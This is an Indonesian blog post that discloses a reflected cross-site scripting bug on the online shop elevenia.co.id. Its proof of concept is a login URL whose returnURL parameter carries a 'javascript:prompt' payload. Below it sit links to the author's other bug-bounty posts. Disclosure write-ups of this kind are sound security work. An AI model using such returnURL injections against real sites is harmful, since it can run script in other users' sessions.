Reflected XSS on elevenia.co.id - Halo Guys, Balik lagi bersama saya :D. Pada artikel kali ini saya cuma mau share aja bahwa saya nemu xss di elevenia.co.id , yakni situs jual beli online di indonesia yang cukup banyak diketahui orang orang.
Jadi ceritanya w abis nonton film back to the future, nah terus ada iklan elevenia tuh. Karena w penasaran akhirnya w telusuri telusuri, dan nemu deh :''"V.
PoC
- Buka :
https://www.elevenia.co.id/login.do?isSSL=Y&returnURL=javascript:prompt(%27XSS BY ./z3rb0a%27);
- Kalau Belom Login Ya Login dulu Baru buka web itu.
- Bingo, alertnya muncul deh :D
![Dapet THR berkat Simple But Dengerous Bug [BugBounty - SQL injection ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyFZ6dG7BB-EaJEiDCypH7JJu_ziaw67PUcJWGXcdyI9URTNj4vWZaicHqkC5zVa-typp6aupLy2KssfVudSf5oMrJ0KHEy6oemybhczmLH4QQ1HaurW861J0dBYNxMGymQHfSi8VlhZNU/s72-c/zotac.PNG "Dapet THR berkat Simple But Dengerous Bug [BugBounty - SQL injection ]")
![[BUGBOUNTY] Able to see everyone original url on ADFLY](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-hSEPdoum7hkh1Db8ffKuMaHzBJ_PKtbZZeiSbuhu7hxhk9nPHLi4eMHZVkkc27EAA1dmfXgvzOPvoQIAbNA4yZlkKtgxzEB4jnTUjIz2n6HSyFgB3ffU4_rqv7es6oRbsd3VuqNI_G6N/s72-c/adfly.jpg "[BUGBOUNTY] Able to see everyone original url on ADFLY")
1 comments: